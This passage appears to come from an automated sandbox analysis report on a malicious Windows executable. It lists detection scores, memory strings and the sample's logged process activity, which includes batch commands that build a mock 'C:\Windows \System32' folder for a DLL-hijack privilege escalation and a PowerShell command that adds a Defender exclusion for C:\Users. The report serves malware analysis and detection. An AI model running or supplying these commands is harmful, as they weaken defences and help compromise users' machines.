lgov.pnco.pnorg.pnedu.pnnet.pncom.prnet.prorg.prgov.predu.prisla.prpro.prbiz.prinfo.prname.prest.prprof.prac.praaa.proaca.proacct.proavocat.probar.procpa.proeng.projur.prolaw.promed.prorecht.proedu.psgov.pssec.psplo.pscom.psorg.psnet.psnet.ptgov.ptorg.ptedu.ptint.ptpubl.ptcom.ptnome.ptco.pwne.pwor.pwed.pwgo.pwbelau.pwcom.pycoop.pyedu.pygov.pymil.pynet.pyorg.pycom.qaedu.qagov.qamil.qaname.qanet.qaorg.qasch.qaasso.recom.renom.rearts.rocom.rofirm.roinfo.ronom.ront.roorg.rorec.rostore.rotm.rowww.roac.rsco.rsedu.rsgov.rsin.rsorg.rsac.ruedu.rugov.ruint.rumil.rutest.rugov.rwnet.rwedu.rwac.rwcom.rwco.rwint.rwmil.rwgouv.rwcom.sanet.saorg.sagov.samed.sapub.saedu.sasch.sacom.sbedu.sbgov.sbnet.sbor
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .xlsmMicrosoft.Office.Desktop_8wekyb3d8bbwe!Excel.dot.dotx.docmMicrosoft.Office.Desktop_8wekyb3d8bbwe!WordMicrosoft.Office.Desktop_8wekyb3d8bbwe!PowerPoint.ods.xla.xlam.xlt.xltm.xltx.xlsb.pps.ppsm.ppsx.thmx.pot.potm.potx.pptmms-powerpointms-excelms-word.odp.ppa.ppamABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/Explorer.AssocActionId.CloseSessionExplorer.AssocActionId.EraseDiscExplorer.AssocActionId.ZipSelectionExplorer.AssocProtocol.search-msExplorer.BurnSelectionExplorer.CloseSessionExplorer.EraseDiscExplorer.ZipSelectionAppExplorer.AssocActionId.BurnSelectionStickyNotestelnettn3270VbscriptwindowsmediacenterappwindowsmediacentersslwindowsmediacenterwebWMP11.AssocProtocol.MMSFileIehistoryIerssJavascriptJscriptLDAPResrlogin.cpf.crd.crds.crt.csh.fxp.gadget.grp.ade.adp.app.application.appref-ms.asp.bas.cnt.ksh.mad.maf.mag.mam.maq.mar.mas.hlp.hme.hpj.hta.ins.isp.its.jse.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mat.mau.mav.maw.mcf.mda.mde.mdt.printerexport.provxml.ps2.ps2xml.psc2.py.pyc.pyo.mshxml.mst.ops.pcd.pl.plg.prf.prg.shb.shs.theme.tsk.vb.vbe.vbp.vsmacros.pvw.plsc.rb.rbw.rdp.rgu.scf.scr.xnk.vsw.webpnp.ws.wsc.wsh.xaml.xdp.xipKOTWCNFRBRITNLSVENDEJAPTTRSKSLARHEEUISDAFIHUNOELPLRUCSiu-Latn-CAiu-CA-Latnbs-Cyrl-BAbs-BA-Cyrlbs-Latn-BAbs-BA-Latnzh-Hantzh-CHTsr-Latn-CSsr-SP-Latnsr-Cyrl-CSsr-SP-Cyrlsr-Latn-BAsr-BA-Latnsr-Cyrl-BAsr-BA-Cyrlzh-Hanszh-CHSarbgcacsdadeitjakonlplptrmroelenesfifrhehuisukbesletlvlttgfaruhrsksqsvthtrurtnvexhzuafkafohivihyazeuhsbmksttstkuzttbnpaguortamtsegayimskkkyswcykmlomyglkokmnisdteknmlasmrsamnbofypsfildvbinffhaibbsyrsichriuamtzmksneomtignhawlasoiipapyoquznsobalbkligkrsahqucrwwoprsgdkuar-SAarnmohbrugmioccogswes-ES_tradnlfi-FIfr-FRhe-ILhu-HUis-ISit-ITja-JPbg-BGca-ESzh-TWcs-CZda-DKde-DEel-GRen-UShr-HRsk-SKsq-ALsv-SEth-THtr-TRur-PKid-IDko-KRnl-NLnb-NOpl-PLpt-BRrm-CHro-ROru-RUvi-VNhy-AMaz-Latn-AZeu-EShsb-DEmk-MKst-ZAts-ZAuk-UAbe-BYsl-SIet-EElv-LVlt-LTtg-Cyrl-TJfa-IRmt-MTse-NOyi-001ms-MYkk-KZky-KGsw-KEtk-TMtn-ZAve-ZAxh-ZAzu-ZAaf-ZAka-GEfo-FOhi-INkn-INml-INas-INmr-INsa-INmn-MNbo-CNcy-GBuz-Latn-UZtt-RUbn-INpa-INgu-INor-INta-INte-INsi-LKchr-Cher-USiu-Cans-CAam-ETtzm-Arab-MAks-Arabne-NPfy-NLkm-KHlo-LAmy-MMgl-ESkok-INmni-INsd-Deva-INsyr-SYquz-BOnso-ZAba-RUlb-LUkl-GLig-NGkr-NGom-ETps-AFfil-PHdv-MVbin-NGff-NGha-Latn-NGibb-NGyo-NGmoh-CAbr-FRug-CNmi-NZoc-FRco-FRgsw-FRsah-RUti-ETgn-PYhaw-USla-001so-SOii-CNpap-029arn-CLar-IQca-ES-valenciazh-CNde-CHen-GBes-MXfr-BEit-CHquc-Latn-GTrw-RWwo-SNprs-AFgd-GBku-Arab-IQqps-plocqps-plocadsb-DEtn-BWse-SEga-IEms-BNuz-Cyrl-UZbn-BDpa-Arab-PKnl-BEnn-NOpt-PTro-MDru-MDsv-FIur-INaz-Cyrl-AZti-ERqps-Latn-x-shqps-plocmar-EGzh-HKde-ATen-AUes-ESta-LKmn-Mong-CNsd-Arab-PKtzm-Latn-DZks-Deva-INne-INff-Latn-SNquz-ECen-CAes-GTfr-CHhr-BAsmj-NOtzm-Tfng-MAar-DZzh-MOfr-CAse-FImn-Mong-MNdz-BTquz-PEar-LYzh-SGde-LUfr-MCsma-NOar-TNen-ZAes-DOfr-029sma-SEar-OMde-LIen-NZes-CRfr-LUsmj-SEar-MAen-IEes-PAsr-Latn-RSsmn-FIar-SYen-BZes-PEfr-SNsr-Cyrl-RSar-JOen-JMes-VEfr-REsms-FIar-YEen-029es-COfr-CDsr-Cyrl-MEar-KWen-PHes-CLf
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "
                        Source: 0vJrK0NCd1.exeReversingLabs: Detection: 92%
                        Source: 0vJrK0NCd1.exeVirustotal: Detection: 84%
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile read: C:\Users\user\Desktop\0vJrK0NCd1.exeJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\0vJrK0NCd1.exe C:\Users\user\Desktop\0vJrK0NCd1.exe
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows "
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO F
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /Y
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exe
                        Source: C:\Windows \System32\easinvoker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                        Source: unknownProcess created: C:\Users\Public\Libraries\Elpuxpki.PIF "C:\Users\Public\Libraries\Elpuxpki.PIF"
                        Source: unknownProcess created: C:\Users\Public\Libraries\Elpuxpki.PIF "C:\Users\Public\Libraries\Elpuxpki.PIF"
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ElpuxpkiO.bat" "Jump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows " Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c mkdir "\\?\C:\Windows \System32"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c ECHO FJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "KDECO.bat" "C:\Windows \System32\" /K /D /H /YJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows \System32\easinvoker.exe C:\Windows \System32\easinvoker.exeJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6 Jump to behavior
                        Source: C:\Windows \System32\easinvoker.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\windows \system32\KDECO.bat""Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c start /min powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" Jump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\System32\SndVol.exe
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jygeob4o.kex.ps1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\3597805b7d7dce423abb491985dd28e8\mscorlib.ni.dllJump to behavior
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_01
                        Source: C:\Windows\SysWOW64\colorcpl.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-QBZ2IM
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_01
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Windows\SysWOW64\colorcpl.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: C:\Users\Public\Libraries\Elpuxpki.PIFFile read: C:\Windows\System32\drivers\etc\hosts
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: C:\Users\user\Desktop\0vJrK0NCd1.exeDirectory created: C:\Program Files\Common Files\System\symsrv.dllJump to behavior
                        Source: 0vJrK0NCd1.exeStatic file information: File size 1131463 > 1048576
                        Source: Binary string: wkernel32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcrt.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371668032.0000000002E62000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wrpcrt4.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shcore.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bcryptprimitives.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fltLib.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cfgmgr32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shell32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wrpcrt4.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371899566.0000000002E6D000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: crypt32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: CLBCatQ.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcp_win.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002B60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.393192241.0000000002B71000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.399135721.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.462920410.0000000002BAB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp, easinvoker.exe
                        Source: Binary string: fastprox.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: easinvoker.pdbH source: 0vJrK0NCd1.exe, 00000000.00000003.444268222.000000007F0F0000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.469716889.0000000004F3C000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: %s\%.*s%s%s%s\%.*s (%s)%s%s.partialaction_closesearch_fieldsmartscreen_rowsmartscreen_oldclient_rowlistview_regionaction_clearaction_optionsaction_smartscreen_buttonsearch_glyphdownload_boxcuetextcleardownload_selectormaininetcore\ieframe\browseui\downloadmanager\downloadfilecopier.cpp.automaticdestinations-ms.bat.cab.cat.appx.appxbundle.appxpackage.customdestinations-ms.der.dmp.dsft.cdxml.cer.cmd.cookie.iso.jar.js.lnk.efi.etl.fon.ini.msp.msu.mui.nst.mp.mpb.msip.msm.p12.p7b.p7c.p7m.olb.ost.otf.p10.pem.pfm.pfx.ps1.p7r.p7s.p7x.pdb.psm1.pst.reg.rll.ps1xml.psc1.psd1.psf.sys.ttc.ttf.vbs.sft.spc.spkg.sst.vsi.vsix.wfs.wim.vhd.vhdx.vmcx.vmrsinetcore\ieframe\browseui\downloadmanager\downloadsecurity.cpp.winmd.wsf.xap source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wUxTheme.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: combase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ucrtbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.371315397.0000000002E66000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cryptbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.369676506.0000000002E63000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shell32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wuser32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fltLib.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.432534742.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.379261612.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32full.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wgdi32full.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370600881.0000000002EDB000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: shcore.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376605940.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: 0vJrK0NCd1.exe, 00000000.00000003.374356345.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ieframe.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wUxTheme.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.392885475.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.368861068.0000000002D6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ole32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: fastprox.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.385818708.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: powrprof.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: powrprof.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.398187463.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: version.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: apphelp.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ole32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373400653.0000000002E6A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Windows.Storage.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: version.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.369193151.0000000002389000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdbGCTL source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: iertutil.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ieframe.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msvcp_win.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.389810334.0000000003411000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cryptbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cfgmgr32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: oleaut32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Windows.Storage.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: combase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_Recor